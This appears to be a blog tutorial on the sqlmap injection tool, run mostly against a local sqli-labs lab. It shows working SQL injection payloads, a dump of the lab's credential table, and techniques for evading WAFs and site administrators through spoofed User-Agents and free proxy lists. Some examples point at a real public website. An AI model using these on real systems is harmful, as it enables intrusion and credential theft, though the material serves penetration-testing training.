1.1 SQLMAP介绍
1.1.1 sqlmap漏洞检测类型
- 基于布尔的盲注检测
- 基于时间的盲注检测
- 基于错误的检测
- 基于union联合查询的检测
- 基于堆叠查询的检测
1.2 SQLMAP使用
1.2.1 SQLMAP帮助
# sqlmap -h ___ __H__ ___ ___[,]_____ ___ ___ {1.6.5#stable} |_ -| . [(] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org Usage: python3 sqlmap [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK Process Google dork results as target URLs Request: These options can be used to specify how to connect to the target URL --data=DATA Data string to be sent through POST (e.g. "id=1") --cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..") --random-agent Use randomly selected HTTP User-Agent header value --proxy=PROXY Use a proxy to connect to the target URL --tor Use Tor anonymity network --check-tor Check to see if Tor is used properly Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --dbms=DBMS Force back-end DBMS to provided value Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH.. SQL injection techniques to use (default "BEUSTQ") Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --passwords Enumerate DBMS users password hashes --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate Operating system access: These options can be used to access the back-end database management system underlying operating system --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC General: These options can be used to set some general working parameters --batch Never ask for user input, use the default behavior --flush-session Flush session files for current target Miscellaneous: These options do not fit into any other category --wizard Simple wizard interface for beginner users [!] to see full list of options run with '-hh'
1.2.1.1 常用参数说明
- -hh:显示高级设置帮助文档
- -u:指定URL进行探测
- -m:通过指定文件扫描多个地址
- -r:指定HTTP请求文件,目标URL,sql注入点
- -l:对burpsuite或者WebScarab日志文件中的目标进行探测
- -b:获取数据库类型,检索DBMS(数据库管理系统)标识
- --dbs:探测可用数据库名称
- -D:指定数据库进行枚举表名称
- --tables:探测表名称
- -T:指定表进行枚举字段名称
- --columns:探测字段名称
- -C:指定字段进行数据获取
- --dump:转出获取到的数据库信息
- --users:探测数据用户名称
- --password:枚举数据库的用户名的密码hash
- --batch:使用默认配置进行探测,可以在探测过程中不使用交互式信息询问
- --user-agent:指定User-Agent内容
- --random-agent:随机生成User-Agent内容
- --proxy:指定代理进行探测
- --delay:指定探测间隔时间,单位为秒
- --proxy-file:通过文件指定多个代理
- --level:检测级别,取值(1-5) 默认情况下sqlmap会测试所有GET参数和POST参数,当level大于等于2时会测试cookie参数,当level大于等于3时会测试User-Agent和Referer,当level=5时会测试Host头
- --current-db:获取当前数据库
- --current-user:获取当前登录数据库用户
- --tamper=space2comment,between:混淆脚本,用于绕过应用层过滤、IPS、WAF,用/**/替换空格字符,用between替换大于号>
- --hex:有时候字符编码的问题可能导致数据丢失,可以使用hex函数来避免,dump非ASCII字符内容时将其编码为16进制形式,收到后解码还原
- --drop-set-cookie:当服务器端cookie有更新,可以使用--drop-set-cookie放弃更新cookie
- --time-sec:基于时间的注入检测相应延迟时间(默认5秒)
- --file-read:读取远端系统文件到本地
- --technique=TECH 使用指定的类型(BEUSTQ)进行探测,默认全部使用
-
- B: Boolean-based blind (布尔盲注)
- E: Error-based (报错注入)
- U: Union query-based (联合查询注入)
- S: Stacked queries (文件系统,操作系统,注册表相关注入)
- T: Time-based blind (时间盲注)
注意:当使用sqlmap要读取目标系统上文件或对目标系统进行指令的操作,或者对读取目标系统注册表(windows) 的话需要使用S。
1.2.2 探测单一目标
1.2.2.1 执行探测
针对单个URL进行SQL注入探测,使用-u或者--url参数
# sqlmap -u http://192.168.10.159/sqli-labs/Less-1/?id=1
提示探测到后端数据库为MYSQL询问我们是否跳过对于其他数据库的测试,选择y跳过。
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
对于剩余的测试,您想要包括所有针对"MySQL"扩展提供的级别(1) 和风险(1) 值的测试吗?
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
探测到ID参数是脆弱的,提示我们是否需要测试其他项,选择y即可。
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
1.2.2.2 探测结果
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 4290=4290 AND 'Udod'='Udod Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 5563 FROM(SELECT COUNT(*),CONCAT(0x7170717071,(SELECT (ELT(5563=5563,1))),0x716b717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NFrs'='NFrs Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 2923 FROM (SELECT(SLEEP(5)))PexQ) AND 'PnAx'='PnAx Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-3315' UNION ALL SELECT NULL,NULL,CONCAT(0x7170717071,0x7a4b49646f774f436f474e434a706647745a44676d536c4f764f4f6149615a716b487946726a6358,0x716b717071)-- - --- [10:47:44] [INFO] the back-end DBMS is MySQL [10:47:44] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s) web server operating system: Linux CentOS 7 web application technology: PHP 5.4.16, Apache 2.4.6 back-end DBMS: MySQL >= 5.0 (MariaDB fork)
1.2.3 探测多个目标
1.2.3.1 创建目标地址集合文件
# vim sqlmap.txt http://192.168.10.159/sqli-labs/Less-1/?id=1 http://192.168.10.159/sqli-labs/Less-2/?id=1 http://192.168.10.159/sqli-labs/Less-3/?id=1
1.2.3.2 执行探测
# sqlmap -m sqlmap.txt --dbs --users --batch
1.2.3.3 探测结果
[13:45:46] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 7 web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:45:46] [INFO] fetching database users database management system users [6]: [*] ''@'centos7-sqlilabs' [*] ''@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'::1' [*] 'root'@'centos7-sqlilabs' [*] 'root'@'localhost' [13:45:46] [INFO] fetching database names [13:45:46] [INFO] resumed: 'information_schema' [13:45:46] [INFO] resumed: 'challenges' [13:45:46] [INFO] resumed: 'mysql' [13:45:46] [INFO] resumed: 'performance_schema' [13:45:46] [INFO] resumed: 'security' [13:45:46] [INFO] resumed: 'test' available databases [6]: [*] challenges [*] information_schema [*] mysql [*] performance_schema [*] security [*] test
1.2.4 从文件加载HTTP请求探测
登录成功后刷新页面获取带cookie的请求头
# vim cookie.txt GET /sqli-labs/Less-20/index.php HTTP/1.1 Host: 192.168.10.159 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.10.159/sqli-labs/Less-20/ Connection: close Cookie: uname=admin* Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
1.2.4.3 执行检测
# sqlmap -r cookie.txt --level 3 --batch –dbs
1.2.4.4 探测结果
[14:20:32] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 7 web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:20:32] [INFO] fetching database names [14:20:32] [INFO] retrieved: 'information_schema' [14:20:32] [INFO] retrieved: 'challenges' [14:20:32] [INFO] retrieved: 'mysql' [14:20:32] [INFO] retrieved: 'performance_schema' [14:20:32] [INFO] retrieved: 'security' [14:20:32] [INFO] retrieved: 'test' available databases [6]: [*] challenges [*] information_schema [*] mysql [*] performance_schema [*] security [*] test
1.2.5 从burpsuite日志记录进行探测
1.2.5.1 burpsuite开启日志记录
1.2.5.2 浏览器访问路径让burpsuite产生日志
开启burpsuite的intercept,多访问几个地址,全部Forward
查看日志内容:
# cat /home/pinming/Documents/burpsuite.txt ====================================================== 2:57:15 PM http://192.168.10.159:80 ====================================================== GET /sqli-labs/Less-1/?id=1 HTTP/1.1 Host: 192.168.10.159 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=p4htta40u6nis7p003jb4ihcg5 Upgrade-Insecure-Requests: 1 ......
1.2.5.3 执行探测
# sqlmap -l /home/pinming/Documents/burpsuite.txt --level 3 --dbs --batch
1.2.5.4 探测结果
[14:59:01] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 7 web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:59:01] [INFO] fetching database names [14:59:01] [INFO] resumed: 'information_schema' [14:59:01] [INFO] resumed: 'challenges' [14:59:01] [INFO] resumed: 'mysql' [14:59:01] [INFO] resumed: 'performance_schema' [14:59:01] [INFO] resumed: 'security' [14:59:01] [INFO] resumed: 'test' available databases [6]: [*] challenges [*] information_schema [*] mysql [*] performance_schema [*] security [*] test
1.2.6 指定注入类型进行注入
1.2.6.1 指定使用布尔型探测
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --technique=B –batch
1.2.6.2 探测结果
sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 4290=4290 AND 'Udod'='Udod --- [15:10:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 7 web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: MySQL >= 5.0 (MariaDB fork)
1.2.7 枚举数据库信息
1.2.7.1 获取数据库名称
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dbs available databases [6]: [*] challenges [*] information_schema [*] mysql [*] performance_schema [*] security [*] test
1.2.7.2 获取表名称
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables Database: security [4 tables] +----------+ | emails | | referers | | uagents | | users | +----------+
1.2.7.3 获取字段名称
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security -T users --columns Database: security Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(3) | | password | varchar(20) | | username | varchar(20) | +----------+-------------+ # sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" -D security --tables --columns Database: security [4 tables] +----------+ | emails | | referers | | uagents | | users | +----------+ Database: security Table: referers [3 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | id | int(3) | | ip_address | varchar(35) | | referer | varchar(256) | +------------+--------------+ Database: security Table: uagents [4 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | id | int(3) | | ip_address | varchar(35) | | uagent | varchar(256) | | username | varchar(20) | +------------+--------------+ Database: security Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int(3) | | password | varchar(20) | | username | varchar(20) | +----------+-------------+ Database: security Table: emails [2 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | email_id | varchar(30) | | id | int(3) | +----------+-------------+
1.2.7.4 获取字段数据
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --dump -D security -T users -C "username,password" Database: security Table: users [15 entries] +------------+------------+ | username | password | +------------+------------+ | Dumb | Dumb | | Angelina | I-kill-you | | Dummy | p@ssword | | secure | crappy | | stupid | stupidity | | superman | genious | | batman | mob!le | | admin | 654321 | | admin1 | admin1 | | admin2 | admin2 | | admin3 | admin3 | | dhakkan | dumbo | | admin4 | admin4 | | admin'-- + | 123456 | | root | 123456 | +------------+------------+
1.3 SQLMAP请求参数
1.3.1 默认参数
通过抓包可以得知SQLMAP的User-Agent为sqlmap/1.6.5#stable (https://sqlmap.org)
SQLMAP的特征非常明显,网站管理员可以通过这些明显的特征对我们的访问进行过滤。
1.3.2 修改默认请求参数
1.3.2.1 指定User-Agent
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --user-agent "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" --batch

通过--user-agent选项指定后可以发现User-Agent是我们所指定的伪造内容信息,从而可以绕过网站管理员过滤
1.3.2.2 随机修改User-Agent
# sqlmap -u "http://192.168.10.159/sqli-labs/Less-1/?id=1" --random-agent --batch

1.3.3 使用代理进行探测
免费的代理地址https://www.kuaidaili.com/free/inha/
使用代理进行探测时,是不能够探测内网目标的,除非目标在公网也能够正常访问。
1.3.3.1 使用单一代理进行探测
# sqlmap -u "http://www.baidu.com" --proxy "http://202.55.5.209:8090" --delay="1" --random-agent –batch
1.3.3.2 使用多个代理地址进行探测
# vim proxy.txt http://183.247.199.114:30001 http://183.247.211.50:30001 http://122.9.101.6:8888 # sqlmap -u "http://www.baidu.com" --proxy-file=/root/proxy.txt --delay="1" --random-agent --batch
1.3.3.3 HTTPS探测
由于SQLmap不支持https直接探测,所以可以开启本地burpsuite,通过本地代理进行探测:
# sqlmap -u "https://www.baidu.com" --proxy "http://127.0.0.1:8080" --delay="1" --random-agent --batch <img class="aligncenter size-full wp-image-2336" src="https://blog.leonshadow.cn/wp-content/uploads/2022/08/sql65.png" alt="" width="1897" height="236" />

我的微信
如果有技术上的问题可以扫一扫我的微信